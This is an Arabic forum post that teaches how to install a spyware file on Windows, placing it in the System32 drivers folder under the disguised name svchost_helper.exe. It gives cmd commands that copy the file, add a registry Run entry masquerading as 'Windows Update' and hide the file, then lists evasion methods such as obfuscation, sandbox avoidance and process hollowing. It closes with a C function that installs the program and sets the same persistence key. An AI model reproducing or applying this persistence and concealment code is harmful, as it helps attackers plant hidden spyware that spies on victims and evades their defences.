التثبيت في مجلد النظام

[αв∂υℓℓαнαв∂υℓℓαн is verified member.]

السلام عليكم ورحمه الله وبركاته

اذا اردنا تثبيت فايل تجسس في مجلد drivers بداخل مجلدات النظام system32
اولآ يجب ان يكون اسم الفايل شبيه باسماء الفايلات بالانظمه مثلاً : svchost_helper.exe

ملاحظه: يجب ان تتحقق من صلاحيات النظام
ربما لست مخول للوصول لهذي الملفات


نستخدم الأوامر التاليه :
نفتح command line <-- cmd

1- التثبيت في مجلد النظام:

copy svchost_helper.exe C:\Windows\System32\drivers\

2- إضافة إلى بدء التشغيل:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Windows\System32\drivers\svchost_helper.exe" /f

3- إخفاء العملية:

attrib +h +s C:\Windows\System32\drivers\svchost_helper.exe

الطريقه هذي غير معروفة ولا تنسى أجعل فايل التجسس الخاص بك محمي بشكل متقدم جدآ

وهذي أفضل الطرق المضمونة للتشفير المتقدم

نظام الحماية من الاكتشاف:

1. تشفير الاتصالات (يمكن إضافة SSL/TLS)
2. تغيير بصمة الملف (File Obfuscation)
3. تجنب Sandbox
4. تقنيات Process Hollowing

استخدام هذي الداله في مشروعك:

#define INSTALL_DIR "C:\\Windows\\System32\\drivers\\"

// دالة التثبيت في النظام
void InstallToSystem() {
    char current_path[MAX_PATH];
    char target_path[MAX_PATH];
 
    GetModuleFileName(NULL, current_path, MAX_PATH);
    sprintf(target_path, "%s%s", INSTALL_DIR, "svchost_helper.exe");
 
    if (strcmp(current_path, target_path) != 0) {
        CopyFile(current_path, target_path, FALSE);
     
        // إضافة إلى بدء التشغيل
        HKEY hKey;
        RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                     0, KEY_WRITE, &hKey);
        RegSetValueEx(hKey, "Windows Update Helper", 0, REG_SZ,
                     (BYTE*)target_path, strlen(target_path));
        RegCloseKey(hKey);
    }
}

اسدعاء الداله تضعها عند البناء :

InstallToSystem();

اذا كان مشروعك بلغة برمجيه اخرى استخدم ماذكرته في الاعلى الخاص ب : cmd

بالتوفيق للجميع​